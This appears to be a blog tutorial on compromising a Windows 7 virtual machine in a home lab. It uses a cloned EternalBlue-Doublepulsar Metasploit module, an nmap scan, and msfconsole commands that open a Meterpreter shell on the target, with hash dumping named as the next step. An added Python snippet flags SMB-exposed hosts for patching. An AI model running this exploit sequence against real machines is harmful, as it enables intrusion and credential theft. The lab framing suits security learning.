How to attack Windows7 using Metasploit

M'hirsi Hamza
Nov 6, 2020


Hi Medium! Here we are again with a new article. Today we will share a small tutorial where we attack a Windows 7 machine and get a Meterpreter shell on it, so we will talk about:

+ What is Metasploit?
+ What is Meterpreter?
+ What is EternalBlue?
+ Exploit

+ What is Metasploit?

Metasploit is a framework that helps with penetration testing and IDS signature development, and it provides a large number of exploits that help find security vulnerabilities.

+ What is Meterpreter?


Meterpreter is a tool that is packaged together with the Metasploit framework. The features of Meterpreter are:

1. It does not create any files on the hard disk; it resides in memory and attaches itself to a process.
2. Client-server communication uses a type-length-value (TLV) format.
3. Client-server communication between the attacker machine and the victim machine is encrypted.
4. It provides a platform for writing extensions.

+ What is EternalBlue?

EternalBlue, sometimes stylized as ETERNALBLUE, is an exploit developed by the U.S. National Security Agency (NSA), according to testimony by former NSA employees. It was leaked by the Shadow Brokers hacker group on April 14, 2017, and was used as part of the worldwide WannaCry ransomware attack on May 12, 2017. The exploit was also used to help carry out the NotPetya cyberattack on June 27, 2017, and was reported to be used as part of the Retefe banking trojan since at least September 5, 2017. EternalBlue is based on multiple vulnerabilities in the Windows implementation of the SMB protocol.

If you want to understand more about how EternalBlue works, I recommend this link: https://research.checkpoint.com/eternalblue-everything-know/

+ Exploit

Now that we have explained some important terms: this exploitation is really easy, and I recommend that every security beginner (like me :p) start with these simple steps to get an idea of “how you can attack a target” and find out whether you are interested in working on the blue team or the red team. I highly recommend understanding EternalBlue at least 60%.

So we will need two .iso images, Windows 7 (64-bit or 32-bit) and Kali, plus Oracle VM VirtualBox LINK. Let’s begin.


1- Create two new virtual machines: Kali and Windows 7

You can follow these tutorials (Kali, Windows 7) if this is the first time you create a virtual machine, so you don’t run into problems; if the virtualization option is not enabled in the BIOS, check this LINK.

Go to the network settings for both machines and choose bridged or NAT (I personally prefer bridged) so that both machines can communicate with each other and get IP addresses dynamically.

Check your IP address on Windows 7; this will be our target.

+ Before we begin we need to run these commands to update our Kali OS:

$ apt-get update
$ apt-get upgrade

and install our exploit from GitHub on Kali (the standard EternalBlue module that ships with Metasploit doesn't work on Windows 7 32-bit). The module is cloned into /root, so the path in the mv command is relative to that directory:

$ cd /root
$ git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
$ mv Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

2- Scan the target

In real life you will not get the victim’s IP address easily, so first you need to run a full scan of your network and look for important details such as the OS version, using Nmap:

$ nmap -v -Pn -O <ip@>

As we will use EternalBlue, we just need to ensure that SMB port 445 is open.
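Seen from the defending side, the same scan output tells you which machines on the network still expose SMB and need the EternalBlue (MS17-010) fix verified. As an added example, not code from the original article, this Python snippet parses Nmap grepable (-oG) output and flags hosts with TCP/445 open, marking Windows 7 era fingerprints for patching or isolation; the sample scan lines, host addresses and the LEGACY_WINDOWS list are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample of `nmap -v -Pn -O -oG -` output for a lab subnet;
# the hosts and OS fingerprints are made up for this example.
SAMPLE_NMAP_GREPABLE = """\
# Nmap 7.91 scan initiated as: nmap -v -Pn -O -oG - 192.168.56.0/24
Host: 192.168.56.101 ()\tPorts: 135/open/tcp//msrpc///, 445/open/tcp//microsoft-ds///\tOS: Microsoft Windows 7 SP1
Host: 192.168.56.102 ()\tPorts: 22/open/tcp//ssh///, 445/closed/tcp//microsoft-ds///\tOS: Linux 5.4
Host: 192.168.56.103 ()\tPorts: 445/open/tcp//microsoft-ds///\tOS: Microsoft Windows 10
# Nmap done
"""

# Assumed list of fingerprints old enough that the MS17-010 fix must be verified.
LEGACY_WINDOWS = ("Windows XP", "Windows Vista", "Windows 7", "Windows Server 2008")


@dataclass
class SmbExposure:
    host: str
    os_guess: str
    legacy_windows: bool  # OS guess matches an entry in LEGACY_WINDOWS


def _field(line, name):
    """Value of a tab-separated 'Name: value' field in a grepable line, or ''."""
    m = re.search(r"(?:^|\t)" + re.escape(name) + r": ([^\t]*)", line)
    return m.group(1).strip() if m else ""


def find_smb_exposed(grepable_text):
    """One SmbExposure per host whose TCP/445 is reported open."""
    exposed = []
    for line in grepable_text.splitlines():
        if line.startswith("#"):
            continue
        ports = _field(line, "Ports")
        # Each port entry looks like 445/open/tcp//microsoft-ds///
        if not re.search(r"(?:^|, )445/open/tcp", ports):
            continue
        host = _field(line, "Host").split(" ")[0]
        os_guess = _field(line, "OS")
        legacy = any(tag in os_guess for tag in LEGACY_WINDOWS)
        exposed.append(SmbExposure(host, os_guess, legacy))
    return exposed


for e in find_smb_exposed(SAMPLE_NMAP_GREPABLE):
    print(e.host, e.os_guess, "PATCH/ISOLATE" if e.legacy_windows else "review")
```

Feed it real output from `nmap ... -oG -` to get an inventory of SMB-exposed hosts that still need the patch or a firewall rule on 445.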

3- Run Metasploit

Run $ msfconsole in your terminal to open Metasploit. Now we need to select the exploit we will use with this command (the module is referenced by its path without the .rb extension):

> use exploit/windows/smb/eternalblue_doublepulsar

Then we check which options we need to set before starting the attack:

> show options

Here we set our target; the port is already configured by default to 445, and the listener will be configured automatically with your Kali machine's IP address:

> set RHOST <Target IP@>
> set RPORT 445

To run the attack we just type:

> run (or exploit)

Now a Meterpreter command line is open on our victim, and from here we can run more modules to dump password hashes and run other attacks….

+ References

https://cyruslab.net/2012/03/07/metasploit-about-meterpreter/
https://en.wikipedia.org/wiki/EternalBlue

I hope that you enjoyed this article as always; if you have something to add, don’t hesitate to write a comment ^^ and to follow :p


M'hirsi Hamza

Cyber Security Architect at Rakuten Symphony Deutschland, talks about #innovation, #technology, #cyberattack, #cyberdefense, and #cybersecurity